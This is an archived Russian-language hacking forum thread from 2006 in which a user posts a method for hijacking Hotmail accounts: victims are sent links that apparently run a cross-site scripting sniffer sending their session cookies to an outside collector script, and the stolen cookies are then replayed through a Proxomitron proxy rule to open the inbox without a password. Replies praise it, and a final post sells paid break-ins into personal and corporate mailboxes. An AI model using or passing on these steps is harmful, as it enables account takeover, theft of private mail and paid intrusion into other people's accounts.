Просмотр полной версии : Взлом ХотМайла
Actu@l SpY
25.09.2006, 21:49
Взлом ХотМайла
линк сниффера:
http://devarsiv.org/picture5.jpg
http://devarsiv.org/a.gif
http://www.devarsiv.org/a.txt
при нажатии на линк у жертвы уплывут куки на аддресс:
www.devarsiv.org/alex/alex.php
Подмена куки и вход в инбокс обходя пасс: через Mozila Firefox в настройках браузера:tools,option,connection setting,manual proxy configuration HTTP proxy вводим 127.0.0.1 port 8080 ставим у себя галочку на: use this proxy server for all protocols
идиом дальше: качаем http://www.devarsiv.org/proxomitron.zip
открываем подручным текстовым редактором в проксеметроне файл default.cfg находим строку:
In = TRUE
Out = TRUE
Key = "cookie:hott"
Match = "*"
Replace = ""
и меж кавычек в Replace = "" вставляем наши куки
теперь в браузере Mozila Firefox вводим этот аддрecc:http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и попадаем в инбокс обходя пасс
просьба не злоупотреблять приведённым примером
всем удачного xака !!
nc.STRIEM
26.09.2006, 00:20
Чесно говоря ниче не понял!
При нажатие на какой линк у жертвы уплывают куки???
про XSS здесь ниче не написано!
Можно чуть по поподробней про сам угон куков!
Что то уж очень похоже на развод. Лень проверять - докажи что нет - уберу минус, воткну плюс
Actu@l SpY
26.09.2006, 02:33
нажав на линк одной из этих ссылок:
http://devarsiv.org/picture5.jpg
http://devarsiv.org/a.gif
http://www.devarsiv.org/a.txt
__________________________________________________ ___
куки уплывут на адрес: www.devarsiv.org/alex/alex.php
подменяете куки в проксометроне.
a в браузере Mozila Firefox пройдя по этой ссылке:
http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes
и вы в инбоксе
Actu@l SpY
26.09.2006, 02:48
Что то уж очень похоже на развод. Лень проверять - докажи что нет - уберу минус, воткну плюс
100% рабочая бага
раньше срабатывала и на яхо, но на яхо багу недавно закрыли
[hidden]
26.09.2006, 04:11
Автор, не скажу что это лажа, но с той статьи, откуда ты это взял, мог и полные пути выдрать. Попробуй зайди на http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes
Далее, где тут XSS, которая кукисы сдирает? Ты привел адреса снифферов, но их надо как-то применить
Actu@l SpY
26.09.2006, 07:00
статья моя сам написал, не откуда не выдёргивал.
объясню ещё раз, бага рабочая работает без проблем.
эту ссылку: http://www.devarsiv.org/a.txt скиньте на хотмайл
после нажатия на ссылку жертва попадет к себе-же в календарь
сработает скрипт и куки уплывут на адрес: www.devarsiv.org/alex/alex.php
далее: открываем текстовым редактором в проксометроне файл "default.cfg" находим строку
In = TRUE
Out = TRUE
Key = "cookie:hott"
Match = "*"
Replace = ""
и меж кавычек в Replace = " here" вставляем куки
попaдём мы в инбокс только через Mozila Firefox
изменим в настройках браузера:configuration HTTP proxy: на 127.0.0.1 порт 8080
после запустим сам проскометрон он должен будет ждать соединения на 8080 порту
в браузере Мозила где вы изменили configuration HTTP proxy на 127.0.0.1 8080 вводим: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes и вы попaдаете в инбокс от куда угнали куки
если не разберётесь стучите в асиу
удачи!!
Actu@l SpY
26.09.2006, 07:22
']Автор, не скажу что это лажа, но с той статьи, откуда ты это взял, мог и полные пути выдрать. Попробуй зайди на http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes
Далее, где тут XSS, которая кукисы сдирает? Ты привел адреса снифферов, но их надо как-то применить
сам сплойт у меня на хосте выполнит скрипт, вам нужно,
чтоб жертва просто прошла по одной любой из этих ссылок:
http://devarsiv.org/a.gif
http://devarsiv.org/picture5.jpg
http://www.devarsiv.org/a.txt
а на этот адрес: www.devarsiv.org/alex/alex.php придут куки
Actu@l SpY
26.09.2006, 07:39
кто хочет ломануть мыло в домен-не хотмаил может воспользоваться уже готовым приведённым выше мной вариантом
сам сплойт и ксс на хотмайле выкладывать в паблик не буду,кто реально нуждается стучите могу скинуть все нужные файлы, для этого вам понадобится хост с поддержкой Php
Короч я понял. Фишка в следующем. Верхний вариант -- это если ты уже в корень обленился, не собрать сплоит, не залить его и т.д. Нижний вариант, я имею ввиду предложение кому надо сплоит и т.п. -- это если ты не веришь, что это должно работать:))))))))
Actu@l SpY
26.09.2006, 09:48
2 Mukis
неправильно ты всё понял, приведённый мной вариант полностью готов к использованию,моя ошибка я не правильно выложил путь к инбоксу
я исправил по этой ссылки попадаем в инбокс: http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes
сейчас сделаю видео
SladerNon
26.09.2006, 13:17
Actu@l SpY
Молодец!.
nc.STRIEM
26.09.2006, 16:16
Прочитав твой первый пост сначало ниче не понял, т.к. ты там мало че обяснил! потом посмотрел видео и врубился!Суть: использование пасивной XSS на msn и CИ )))) МОЛОДЕЦ!
hackermail
05.10.2006, 20:18
Предлагаю услуги взломы почтовых ящиков, в почтовых службах @mail.ru, @bk.ru, @inbox.ru, @list.ru, @rambler.ru, @yandex.ru. А так же комерчиские взломы почтовых ящиков фирм и предприятий например @samsung.com, @lg.ru.
Расценки:
Взлом одного ящика: 5 wmz (при взломе нескольких ящиков возможны скидки)
Комерческий взлом: 500 wmz
А так же могу показать баги или мануал по взлому ящика: 200 wmz
В качестве гарантий пресылаю скриншот со взломанного ящика, и только после оплаты по средствам WebMoney (www.webmoney.ru), присылаю вам пароль от взломанного почтового ящика.
Обращаться по e-mail адресу: hackin.mail@mail.ru
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot